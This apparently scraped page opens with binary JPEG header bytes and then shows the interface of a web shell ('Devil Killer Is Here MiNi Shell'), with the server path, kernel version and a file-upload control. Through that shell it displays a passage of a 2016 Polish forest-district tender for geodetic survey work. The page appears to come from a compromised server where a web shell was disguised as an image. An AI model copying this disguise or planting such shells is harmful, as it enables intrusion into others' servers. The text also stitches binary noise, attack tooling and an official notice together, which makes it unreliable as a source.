JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160608/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20160608/76127-N-2016.html

<p class="kh_header"><b>Leśno: Wykonanie geodezyjnych prac przygotowawczych dla potrzeb V rewizji planu urządzenia lasu w Nadleśnictwie Przymuszewo oraz sporządzenie ewidencyjnej mapy numerycznej zgodnej ze Standardem Leśnej Mapy Numerycznej</b><br>
<b>Numer ogłoszenia: 76127 - 2016; data zamieszczenia: 08.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Przymuszewo , Przymuszewo 3, 89-634 Leśno, woj. pomorskie, tel. 52 5541919, faks 52 5541919.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.przymuszewo.torun.lasy.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa jednostka organizacyjna nieposiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie geodezyjnych prac przygotowawczych dla potrzeb V rewizji planu urządzenia lasu w Nadleśnictwie Przymuszewo oraz sporządzenie ewidencyjnej mapy numerycznej zgodnej ze Standardem Leśnej Mapy Numerycznej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usług geodezyjnych polegających na :

- wykonaniu ewidencyjnej mapy numerycznej Nadleśnictwa Przymuszewo zgodnie ze standardem Leśnej Mapy Numerycznej wraz z aktualizacją rejestru gruntów zgodnie z powszechną ewidencją gruntów i budynków , pozwalającą na automatyczne przywiązanie wyłączeń do działek i eksport do programu TAKSATOR oraz wydruk sporządzonego rejestru gruntów , wydruk przeprowadzonych zmian powierzchniowych w ramach obrębów leśnych z uwzględnieniem podziału administracyjnego ;
- wznowieniu znaków granicznych wraz z okopaniem rowkiem okalającym i przygotowaniem dokumentacji technicznej ;
- rozgraniczenie nieruchomości ;
- łączenie działek ewidencyjnych ;
- aktualizacji użytków gruntowych wskazanych przez Nadleśnictwo ;
- wprowadzeniu zmian numeracji działek do ewidencji powszechnej oraz ksiąg wieczystych ;.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenie zamówień uzupełniających w wielkości do 50 % wartości zamówienia podstawowego , o których mowa w art. 67 ust. 1 pkt 6 ustawy i podlegających na powtórzeniu tego samego rodzaju zamówień w okresie 3 lat od udzielenia niniejszego zamówienia podstawowego dotychczasowemu Wykonawcy.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.35.00.00-6, 71.35.18.10-4, 71.35.40.00-4, 71.35.50.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający wymaga wniesienia wadium .
2.	Ustala się wadium dla całości przedmiotu zamówienia w wysokości : 2 500,00 zł 
      ( słownie : dwa tysiące pięćset złotych 00/100 ) .
3.	Wykonawca wnosi wadium :
a.	w formie pieniężnej,
b.	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej z tym , że zobowiązanie kasy jest zawsze poręczeniem pieniężnym ,
c.	w gwarancjach bankowych ,
d.	w gwarancjach ubezpieczeniowych ,
e.	w poręczeniach udzielanych przez podmioty , o których mowa w art.6b ust.5 pkt 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz. U. z 2016 , poz. 359 ) ,

Wadium w formie pieniężnej należy wpłacić na rachunek bankowy Zamawiającego : 
BGŻ BNP Paribas 54 20300045 1110 0000 0195 3620 . W tytule przelewu należy wpisać:  Wykonanie geodezyjnych prac przygotowawczych dla potrzeb V rewizji planu urządzenia lasu w  Nadleśnictwie Przymuszewo oraz sporządzenie ewidencyjnej mapy numerycznej zgodnie ze Standardem Leśnej Mapy Numerycznej przed upływem terminu składania ofert tj. do dnia 23.06.2016 roku do godz. 10.00 . Za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku Zamawiającego .
Wadium wnoszone w formach określonych w pkt XI.3 b., c. , d. , e. Wykonawca składa w następujący sposób:
- oryginał poręczeń bankowych , gwarancji bankowych i ubezpieczeniowych należy złożyć w kasie Nadleśnictwa Przymuszewo , przed upływem terminu składania ofert .

4.	Zamawiający zwróci wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty lub unieważnieniu postępowania , z wyjątkiem Wykonawcy , którego oferta została wybrana jako najkorzystniejsza , z zastrzeżeniem pkt XI.9  SIWZ .
5.	Wykonawcy , którego oferta zostanie wybrana jako najkorzystniejsza , Zamawiający zwróci wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz po wniesieniu zabezpieczenia należytego wykonania umowy .
6.	Zamawiający zwróci niezwłocznie wadium , na wniosek Wykonawcy , który wycofa ofertę przed upływem terminu składania ofert .
7.Zamawiający zażąda  ponownego wniesienia wadium przez Wykonawcę , któremu zwrócono wadium zgodnie z pkt  XI.4 SIWZ , jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza . Wykonawca wniesie wadium w terminie określonym przez Zamawiającego .
8.	W przypadku , gdy wadium zostanie wniesione w pieniądzu , Zamawiający zwróci je na rachunek bankowy wskazany przez Wykonawcę , wraz z odsetkami , które wynikają z umowy rachunku bankowego , na którym wadium było przechowywane , pomniejszonymi o koszty prowadzenia rachunku bankowego oraz kosztami prowizji bankowej za przelew .
9.Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie , o którym mowa w art.26 ust. 3 ustawy Prawo Zamówień  Publicznych , z przyczyn od niego zależnych nie złoży dokumentów lub oświadczeń  , o których mowa w art. 25 ust.1 ustawy Prawo Zamówień Publicznych , pełnomocnictw , listy podmiotów należących do tej samej grupy kapitałowej , o której mowa w art.24 ust.2 pkt 5 lub informacji o tym , że nie należy do grupy kapitałowej , lub nie wyrazi zgody na poprawienie omyłki , o której mowa w art. 87 ust.2 pkt 3 co spowoduje brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej .
10.	Zamawiający zatrzyma wadium wraz z odsetkami , jeżeli Wykonawca , którego oferta zostanie wybrana:
a.	odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie 
b.	nie wniesie zabezpieczenia wymaganego do należytego wykonania umowy 
c.	zawarcie umowy w sprawie zamówienia publicznego będzie niemożliwe z przyczyn zależnych od Wykonawcy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje wymogów w zakresie tego warunku .</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie spełniony , jeżeli Wykonawca wykaże , że w okresie ostatnich 3 lat , a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie , wykonał co najmniej jedną usługę ( wymagane potwierdzenie , że usługa ta została wykonana należycie ) polegającą na wykonaniu numerycznej mapy ewidencyjnej , zgodnej ze Standardem Leśnej Mapy Numerycznej ( Zarządzenie nr 74 Dyrektora Generalnego Lasów Państwowych z dnia 23.08.2001 roku - tekst jednolity Zarządzenie nr 34 Dyrektora Generalnego LP z dnia 20.04.2005 roku )  przyjętych do państwowego zasobu geodezyjno-kartograficznego ( tzn. przekazanie dokumentacji techniczno-prawnej specjalistycznych pomiarów z uwzględnieniem elektronicznej ewidencyjnej mapy numerycznej sporządzonej wg Standardu Leśnej Mapy Numerycznej do państwowego zasobu geodezyjnego z potwierdzeniem przyjęcia ) o wartości nie mniejszej niż 100 000 zł 
Wykonawca może korzystać z wiedzy i doświadczenia  innych podmiotów , niezależnie od łączących ich stosunków prawnych.
W takiej sytuacji Wykonawca zobowiązany jest udowodnić Zamawiającemu , iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia , przedstawiając w tym celu pisemne zobowiązanie innych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia .
Wykonawca dostarcza Zamawiającemu dokumenty określające :
- zakres zasobów innego podmiotu dostępnych Wykonawcy ;
- zakres i czasokres udziału innego podmiotu przy wykonywaniu zamówienia ;
- sposób wykorzystania zasobów innego podmiotu przez Wykonawcę przy wykonywaniu zamówienia ;
-  charakter zależności łączących Wykonawcę z innym podmiotem ;

Podmiot , który zobowiązał się do udostępnienia zasobów odpowiada wraz z Wykonawcą za szkodę Zamawiającego powstałą na skutek nieudostępnienia tych zasobów , chyba , że nie ponosi winy za nieudostępnienie zasobów .

Ocena spełniania warunków w niniejszym postępowaniu o zamówienie publiczne dokonana zostanie zgodnie z formułą spełnia/nie spełnia , w oparciu o informacje zawarte w dokumentach i oświadczeniach określonych w pkt IX SIWZ, z zastrzeżeniem art.26 ust. 3 i 4 ustawy Prawo zamówień publicznych . 
Z treści załączonych dokumentów musi jednoznacznie wynikać , że Wykonawca spełnia warunki udziału w postępowaniu .</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje wymogów w zakresie tego warunku .</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie spełniony , jeżeli Wykonawca wykaże , że dysponuje osobami zdolnymi do wykonania zamówienia , posiadającymi doświadczenie , kwalifikacje zawodowe oraz wykształcenie odpowiednie do zadań , które zostaną im powierzone tj. co najmniej 3 osoby z uprawnieniami geodezyjnymi nadanymi przez właściwe organy w zakresie :
- rozgraniczania i podziału nieruchomości oraz sporządzania dokumentacji do celów prawnych 
- geodezyjnych pomiarów sytuacyjno-wysokościowych ;
- prac inwentaryzacyjnych ;

Wykonawca może korzystać z potencjału osobowego innych podmiotów , niezależnie od łączących ich stosunków prawnych.
W takiej sytuacji Wykonawca zobowiązany jest udowodnić Zamawiającemu , iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia , przedstawiając w tym celu pisemne zobowiązanie innych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia .
Wykonawca dostarcza Zamawiającemu dokumenty określające :
- zakres zasobów innego podmiotu dostępnych Wykonawcy ;
- zakres i czasokres udziału innego podmiotu przy wykonywaniu zamówienia ;
- sposób wykorzystania zasobów innego podmiotu przez Wykonawcę przy wykonywaniu zamówienia ;
-  charakter zależności łączących Wykonawcę z innym podmiotem ;

Podmiot , który zobowiązał się do udostępnienia zasobów odpowiada wraz z Wykonawcą za szkodę Zamawiającego powstałą na skutek nieudostępnienia tych zasobów , chyba , że nie ponosi winy za nieudostępnienie zasobów .

Ocena spełniania warunków w niniejszym postępowaniu o zamówienie publiczne dokonana zostanie zgodnie z formułą spełnia/nie spełnia , w oparciu o informacje zawarte w dokumentach i oświadczeniach określonych w pkt IX niniejszej specyfikacji , z zastrzeżeniem art.26 ust. 3 i 4 ustawy Prawo zamówień publicznych . 
Z treści załączonych dokumentów musi jednoznacznie wynikać , że Wykonawca spełnia warunki udziału w postępowaniu .</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje wymogów w zakresie tego warunku .</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Udział Podwykonawców
a.	Zamawiający nie ogranicza powierzenia wykonania części zamówienia Podwykonawcom ;
b.	Zgodnie z art.36b ust. 1 ustawy Prawo zamówień publicznych Zamawiający żąda wskazania przez Wykonawcę części zamówienia , której wykonanie zamierza powierzyć Podwykonawcom lub podania przez Wykonawcę nazw firm Podwykonawców , na których zasoby powołuje się na zasadach określonych w art. 26 ust. 2b , w celu wskazania spełniania warunków udziału w postępowaniu , o którym mowa w art.22 ust.1 ;
c.	Zgodnie z art.36b ust.2 ustawy Prawo zamówień publicznych , jeżeli zmiana albo rezygnacja z Podwykonawcy dotyczy podmiotu , na którego zasoby Wykonawca powoływał się na zasadach określonych w art.26 ust.2b w celu wykazania spełniania warunków udziału w postępowaniu , o których mowa w art. 22 ust.1 , Wykonawca jest zobowiązany wykazać Zamawiającemu , że proponowany inny Podwykonawca lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie niniejszego postępowania o udzielenie zamówienia .

Wykonawca zobowiązany jest złożyć dokumenty potwierdzające posiadane uprawnienia i pełnomocnictwa  osób składających ofertę , o ile fakt nie wynika z przedstawionych dokumentów rejestrowych .
Dokumenty wymagane w przypadku składania oferty wspólnej :
1)	Aktualny odpis z właściwego rejestru lub centralnej ewidencji i informacji o działalności gospodarczej , jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust.1 pkt 2 ustawy Prawo zamówień publicznych , wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert ;
2)	Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające , że Wykonawca nie zalega z opłacaniem podatków lub zaświadczenie , że uzyskał przewidziane prawem zwolnienie , odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert ;
3)	Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające,  że Wykonawca nie zalega z  opłacaniem składek na ubezpieczenie zdrowotne i społeczne lub potwierdzenie , że uzyskał przewidziane prawem zwolnienie , odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu , wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert ;
4)	 Oświadczenie Wykonawcy o braku podstaw do wykluczenia - wg wzoru załącznik 5 do niniejszej specyfikacji ;
5) zgodnie z art.26 ust. 2d listę podmiotów należących do tej samej grupy kapitałowej , o której mowa w art. 24 ust.2 pkt 5 ustawy Prawo zamówień publicznych , albo informację o tym , że nie należy do grupy kapitałowej - wg wzoru stanowiącego załącznik nr 6 .
- dla każdego partnera osobno, pozostałe dokumenty składane są wspólnie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin płatności - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Postanowienia umowy zawarto w projekcie umowy stanowiącym załącznik nr 12 do SIWZ .
2.	Zamawiający przewiduje możliwość zmiany umowy w stosunku do treści oferty , na podstawie której wybrano Wykonawcę . Zmiany , o których mowa powyżej mogą być dokonane jeżeli ich uzasadnieniem są niżej wymienione okoliczności :
1)	Zmiana terminu realizacji przedmiotu umowy spowodowana w szczególności :
a.	usterkami w pomiarach ;
b.	brakiem wystarczających materiałów dotyczących granic prawnych w PODGiK ;
c.	koniecznością wykonania prac , których wykonanie w sposób obiektywny uniemożliwia terminowe zakończenie realizacji przedmiotu umowy ;
d.	wstrzymaniem prac przez właściwe organy z przyczyn niezależnych od Wykonawcy ;
e.	innymi przyczynami zewnętrznymi niezależnymi od Wykonawcy i Zamawiającego skutkującymi niemożliwością prowadzenia prac ;

Zamawiający nie ma obowiązku przedłużenia terminu wykonania prac , jeżeli Wykonawca w ciągu 14 dni od zaistnienia okoliczności nie przedstawi Zamawiającemu wniosku o przedłużenie terminu ze szczegółowym uzasadnieniem .
2)	Zmiana zakresu prac :
Zamawiający przewiduje możliwość zmniejszenia zakresu zadań do wykonania ( zmniejszenie najwyżej do 30 % ) . Zmniejszenie wynagrodzenia będzie obliczone w oparciu o stawki jednostkowe wymienione w ofercie .
3)	Zmiana podwykonawców może być dokonana , gdy :
